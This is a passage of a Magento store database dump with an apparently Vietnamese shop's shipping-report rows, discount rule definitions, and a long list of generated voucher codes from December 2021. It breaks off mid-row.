định',9,0.0000,NULL),(79,'2021-10-02',9,'canceled','Free Shipping - Free',1,0.0000,NULL),(80,'2021-10-05',9,'canceled','Miễn phí giao hàng - Miễn phí',5,0.0000,NULL),(81,'2021-10-06',9,'canceled','Miễn phí giao hàng - Miễn phí',9,0.0000,NULL),(82,'2021-10-06',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(83,'2021-10-06',9,'holded','Miễn phí giao hàng - Miễn phí',4,0.0000,0.0000),(84,'2021-10-06',9,'processing','Miễn phí giao hàng - Miễn phí',7,0.0000,0.0000),(85,'2021-10-06',9,'shipment','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(86,'2021-10-07',9,'canceled','Miễn phí giao hàng - Miễn phí',29,0.0000,NULL),(87,'2021-10-07',9,'closed','Miễn phí giao hàng - Miễn phí',8,0.0000,NULL),(88,'2021-10-07',9,'closed','Tỷ lệ cố định - Cố định',2,10.0000,NULL),(89,'2021-10-07',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(90,'2021-10-07',9,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(91,'2021-10-11',9,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(92,'2021-10-11',9,'processing','Miễn phí giao hàng - Miễn phí',2,0.0000,0.0000),(93,'2021-10-18',9,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(94,'2021-10-18',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(95,'2021-11-15',9,'canceled','Miễn phí giao hàng - Miễn phí',41,0.0000,NULL),(96,'2021-11-17',9,'canceled','Miễn phí giao hàng - Miễn phí',2,0.0000,NULL),(97,'2021-11-17',9,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(98,'2021-11-22',9,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(99,'2021-12-05',9,'canceled','Miễn phí giao hàng - Miễn phí',13,0.0000,NULL),(100,'2021-12-06',9,'canceled','Miễn phí giao hàng - Miễn phí',5,0.0000,NULL),(110,'2021-10-02',0,'canceled','Free Shipping - Free',1,0.0000,NULL),(111,'2021-10-05',0,'canceled','Miễn phí giao hàng - Miễn phí',5,0.0000,NULL),(112,'2021-10-06',0,'canceled','Miễn phí giao hàng - Miễn phí',9,0.0000,NULL),(113,'2021-10-06',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(114,'2021-10-06',0,'holded','Miễn phí giao hàng - Miễn phí',4,0.0000,0.0000),(115,'2021-10-06',0,'processing','Miễn phí giao hàng - Miễn phí',7,0.0000,0.0000),(116,'2021-10-06',0,'shipment','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(117,'2021-10-07',0,'canceled','Miễn phí giao hàng - Miễn phí',29,0.0000,NULL),(118,'2021-10-07',0,'closed','Miễn phí giao hàng - Miễn phí',8,0.0000,NULL),(119,'2021-10-07',0,'closed','Tỷ lệ cố định - Cố định',2,10.0000,NULL),(120,'2021-10-07',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(121,'2021-10-07',0,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(122,'2021-10-11',0,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(123,'2021-10-11',0,'processing','Miễn phí giao hàng - Miễn phí',2,0.0000,0.0000),(124,'2021-10-18',0,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(125,'2021-10-18',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(126,'2021-11-15',0,'canceled','Miễn phí giao hàng - Miễn phí',41,0.0000,NULL),(127,'2021-11-17',0,'canceled','Miễn phí giao hàng - Miễn phí',2,0.0000,NULL),(128,'2021-11-17',0,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(129,'2021-11-22',0,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(130,'2021-12-05',0,'canceled','Miễn phí giao hàng - Miễn phí',13,0.0000,NULL),(131,'2021-12-06',0,'canceled','Miễn phí giao hàng - Miễn phí',5,0.0000,NULL),(141,'2021-12-07',9,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(142,'2021-12-07',0,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(143,'2021-12-08',9,'canceled','Miễn phí giao hàng - Miễn phí',6,0.0000,NULL),(144,'2021-12-08',9,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(146,'2021-12-08',0,'canceled','Miễn phí giao hàng - Miễn phí',6,0.0000,NULL),(147,'2021-12-08',0,'processing','Miễn phí giao hàng - Miễn phí',3,0.0000,0.0000),(149,'2021-12-16',9,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(150,'2021-12-16',0,'complete','Miễn phí giao hàng - Miễn phí',1,0.0000,0.0000),(151,'2022-01-04',9,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(152,'2022-01-04',0,'closed','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(153,'2022-01-05',9,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL),(154,'2022-01-05',0,'canceled','Miễn phí giao hàng - Miễn phí',1,0.0000,NULL);

--
-- Table structure for table `salesrule`
--

CREATE TABLE `salesrule` (
  `rule_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `from_date` date DEFAULT NULL COMMENT 'From',
  `to_date` date DEFAULT NULL COMMENT 'To',
  `uses_per_customer` int(11) NOT NULL DEFAULT 0 COMMENT 'Uses Per Customer',
  `is_active` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Active',
  `conditions_serialized` mediumtext DEFAULT NULL COMMENT 'Conditions Serialized',
  `actions_serialized` mediumtext DEFAULT NULL COMMENT 'Actions Serialized',
  `stop_rules_processing` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Stop Rules Processing',
  `is_advanced` smallint(5) unsigned NOT NULL DEFAULT 1 COMMENT 'Is Advanced',
  `product_ids` text DEFAULT NULL COMMENT 'Product Ids',
  `sort_order` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `simple_action` varchar(32) DEFAULT NULL COMMENT 'Simple Action',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `discount_qty` decimal(12,4) DEFAULT NULL COMMENT 'Discount Qty',
  `discount_step` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Discount Step',
  `apply_to_shipping` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Apply To Shipping',
  `times_used` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Times Used',
  `is_rss` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Rss',
  `coupon_type` smallint(5) unsigned NOT NULL DEFAULT 1 COMMENT 'Coupon Type',
  `use_auto_generation` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Use Auto Generation',
  `uses_per_coupon` int(11) NOT NULL DEFAULT 0 COMMENT 'User Per Coupon',
  `simple_free_shipping` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Simple Free Shipping',
  PRIMARY KEY (`rule_id`),
  KEY `SALESRULE_IS_ACTIVE_SORT_ORDER_TO_DATE_FROM_DATE` (`is_active`,`sort_order`,`to_date`,`from_date`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='Salesrule';

--
-- Dumping data for table `salesrule`
--

INSERT INTO `salesrule` VALUES (2,'Voucher giảm giá 500k','','2021-12-10',NULL,1,1,'{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Address\",\"attribute\":\"base_subtotal_total_incl_tax\",\"operator\":\">\",\"value\":\"1000000\",\"is_value_processed\":false},{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Found\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"102, 103\",\"is_value_processed\":false,\"attribute_scope\":\"\"}]}]}','{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"102, 103\",\"is_value_processed\":false,\"attribute_scope\":\"\"},{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"!=\",\"value\":\"166, 167, 168, 169, 170, 171\",\"is_value_processed\":false,\"attribute_scope\":\"\"}]}',0,1,NULL,0,'cart_fixed',500000.0000,NULL,0,0,1,1,2,1,1,0),(3,'voucher giảm giá 300k','','2021-12-20','2022-02-28',1,1,'{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Address\",\"attribute\":\"base_subtotal\",\"operator\":\">\",\"value\":\"1000000\",\"is_value_processed\":false},{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Found\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"102, 103\",\"is_value_processed\":false,\"attribute_scope\":\"\"}]}]}','{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"102, 103\",\"is_value_processed\":false,\"attribute_scope\":\"\"},{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"!=\",\"value\":\"166, 167, 168, 169, 170, 171\",\"is_value_processed\":false,\"attribute_scope\":\"\"}]}',0,1,NULL,0,'cart_fixed',300000.0000,NULL,0,0,0,1,2,1,1,0),(4,'Giảm giá 20% Bá Đạo','','2021-12-30','2021-12-31',1,1,'{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\"}','{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\\\\Combine\",\"attribute\":null,\"operator\":null,\"value\":\"1\",\"is_value_processed\":null,\"aggregator\":\"all\",\"conditions\":[{\"type\":\"Magento\\\\SalesRule\\\\Model\\\\Rule\\\\Condition\\\\Product\",\"attribute\":\"category_ids\",\"operator\":\"==\",\"value\":\"166, 102, 103\",\"is_value_processed\":false,\"attribute_scope\":\"\"}]}',0,1,NULL,0,'by_percent',20.0000,1.0000,0,0,0,1,2,1,100,0);

--
-- Table structure for table `salesrule_coupon`
--

CREATE TABLE `salesrule_coupon` (
  `coupon_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Coupon ID',
  `rule_id` int(10) unsigned NOT NULL COMMENT 'Rule ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `usage_limit` int(10) unsigned DEFAULT NULL COMMENT 'Usage Limit',
  `usage_per_customer` int(10) unsigned DEFAULT NULL COMMENT 'Usage Per Customer',
  `times_used` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Times Used',
  `expiration_date` datetime DEFAULT NULL COMMENT 'Expiration Date',
  `is_primary` smallint(5) unsigned DEFAULT NULL COMMENT 'Is Primary',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Coupon Code Creation Date',
  `type` smallint(6) DEFAULT 0 COMMENT 'Coupon Code Type',
  `generated_by_dotmailer` smallint(6) DEFAULT NULL COMMENT '1 = Generated by dotmailer',
  PRIMARY KEY (`coupon_id`),
  UNIQUE KEY `SALESRULE_COUPON_CODE` (`code`),
  UNIQUE KEY `SALESRULE_COUPON_RULE_ID_IS_PRIMARY` (`rule_id`,`is_primary`),
  KEY `SALESRULE_COUPON_RULE_ID` (`rule_id`),
  CONSTRAINT `SALESRULE_COUPON_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=815 DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon';

--
-- Dumping data for table `salesrule_coupon`
--

INSERT INTO `salesrule_coupon` VALUES (203,2,'FLEXFITOBB',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(204,2,'FLEXFITPIG',1,1,1,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(205,2,'FLEXFIT59E',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(206,2,'FLEXFIT0UH',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(207,2,'FLEXFITE85',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(208,2,'FLEXFIT3SJ',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(209,2,'FLEXFITRCH',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(210,2,'FLEXFITZVN',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(211,2,'FLEXFITK92',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(212,2,'FLEXFIT46R',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(213,2,'FLEXFITKEO',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(214,2,'FLEXFITD0Q',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(215,2,'FLEXFITZVK',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(216,2,'FLEXFIT8PA',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(217,2,'FLEXFITVEG',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(218,2,'FLEXFITL4L',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(219,2,'FLEXFITTI7',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(220,2,'FLEXFITYPD',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(221,2,'FLEXFIT6IT',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(222,2,'FLEXFIT2NK',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(223,2,'FLEXFITGGH',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(224,2,'FLEXFIT7JL',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(225,2,'FLEXFITXE5',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(226,2,'FLEXFITZMH',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(227,2,'FLEXFITXKK',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(228,2,'FLEXFITOHF',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(229,2,'FLEXFITNW1',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(230,2,'FLEXFIT6CW',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(231,2,'FLEXFITY9M',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(232,2,'FLEXFIT61J',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(233,2,'FLEXFITJ33',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(234,2,'FLEXFITSNL',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(235,2,'FLEXFITITL',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(236,2,'FLEXFIT2G2',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(237,2,'FLEXFIT63T',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(238,2,'FLEXFITHIU',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(239,2,'FLEXFIT6A7',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(240,2,'FLEXFITOY6',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(241,2,'FLEXFIT1C8',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(242,2,'FLEXFITTZ0',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(243,2,'FLEXFITH6D',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(244,2,'FLEXFIT96M',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(245,2,'FLEXFITHSH',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(246,2,'FLEXFITPPS',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(247,2,'FLEXFIT8V7',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(248,2,'FLEXFITELD',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(249,2,'FLEXFITU0F',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(250,2,'FLEXFITREF',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(251,2,'FLEXFITT81',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(252,2,'FLEXFITDLE',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(253,2,'FLEXFIT8YK',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(254,2,'FLEXFITLYT',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(255,2,'FLEXFITBUJ',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(256,2,'FLEXFITL1W',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(257,2,'FLEXFITV47',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(258,2,'FLEXFITO7Y',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(259,2,'FLEXFIT3RK',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(260,2,'FLEXFIT5YB',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(261,2,'FLEXFITF0G',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(262,2,'FLEXFITOA5',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(263,2,'FLEXFIT6GV',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(264,2,'FLEXFITMZ5',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(265,2,'FLEXFITJ27',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(266,2,'FLEXFITMNO',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(267,2,'FLEXFITV2E',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(268,2,'FLEXFITFNV',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(269,2,'FLEXFIT3WN',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(270,2,'FLEXFITUGP',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(271,2,'FLEXFITE3O',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(272,2,'FLEXFITXE6',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(273,2,'FLEXFITMSM',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(274,2,'FLEXFITE10',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(275,2,'FLEXFITSRV',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(276,2,'FLEXFITY8J',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(277,2,'FLEXFITAFZ',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(278,2,'FLEXFIT0WF',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(279,2,'FLEXFIT87J',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(280,2,'FLEXFITI6S',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(281,2,'FLEXFITZBO',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(282,2,'FLEXFIT42K',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(283,2,'FLEXFITOIM',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(284,2,'FLEXFIT88W',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(285,2,'FLEXFITCBF',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(286,2,'FLEXFITCVN',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(287,2,'FLEXFITOL1',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(288,2,'FLEXFITJ0D',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(289,2,'FLEXFIT2H0',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(290,2,'FLEXFITOA6',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(291,2,'FLEXFITMFB',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(292,2,'FLEXFIT22Q',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(293,2,'FLEXFITCKB',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(294,2,'FLEXFITT3P',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(295,2,'FLEXFITYIC',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(296,2,'FLEXFIT7GF',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(297,2,'FLEXFITBRC',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(298,2,'FLEXFITVZX',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(299,2,'FLEXFITHP1',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(300,2,'FLEXFITSKW',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(301,2,'FLEXFITE6K',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(302,2,'FLEXFITOOG',1,1,0,NULL,NULL,'2021-12-10 16:31:47',1,NULL),(303,3,'FFTKMOI',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(304,3,'FFTKM8G',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(305,3,'FFTKVCD',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(306,3,'FFTKUB4',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(307,3,'FFTK91I',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(308,3,'FFTKJAA',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(309,3,'FFTKN5T',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(310,3,'FFTKGGD',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(311,3,'FFTKFDJ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(312,3,'FFTKGBB',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(313,3,'FFTK50K',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(314,3,'FFTKMLP',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(315,3,'FFTK72X',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(316,3,'FFTKCK9',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(317,3,'FFTKRKV',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(318,3,'FFTKLPG',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(319,3,'FFTKPCK',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(320,3,'FFTKVOG',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(321,3,'FFTKUAO',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(322,3,'FFTKV3Y',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(323,3,'FFTKWJO',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(324,3,'FFTK96E',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(325,3,'FFTKBY1',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(326,3,'FFTKNP4',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(327,3,'FFTK9BX',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(328,3,'FFTK526',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(329,3,'FFTKCYJ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(330,3,'FFTK7VN',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(331,3,'FFTKXOF',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(332,3,'FFTKBRO',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(333,3,'FFTK0ZP',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(334,3,'FFTKLT6',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(335,3,'FFTK0W1',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(336,3,'FFTKPXJ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(337,3,'FFTKOWP',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(338,3,'FFTKS2D',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(339,3,'FFTKSS8',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(340,3,'FFTKT75',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(341,3,'FFTKSAS',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(342,3,'FFTKFBM',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(343,3,'FFTK3TZ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(344,3,'FFTKT22',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(345,3,'FFTKH83',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(346,3,'FFTKBEC',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(347,3,'FFTKOMO',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(348,3,'FFTKJXJ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(349,3,'FFTK3TJ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(350,3,'FFTK3ZT',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(351,3,'FFTKT1W',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(352,3,'FFTKN84',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(353,3,'FFTK7P0',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(354,3,'FFTKP5Y',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(355,3,'FFTKHPT',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(356,3,'FFTK6HW',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(357,3,'FFTK4VF',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(358,3,'FFTKS66',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(359,3,'FFTKUZY',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(360,3,'FFTKUSB',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(361,3,'FFTK3ZQ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(362,3,'FFTK0J7',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(363,3,'FFTK4LB',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(364,3,'FFTKIB2',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(365,3,'FFTKGBO',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(366,3,'FFTKNRX',1,1,0,NULL,NULL,'2021-12-17 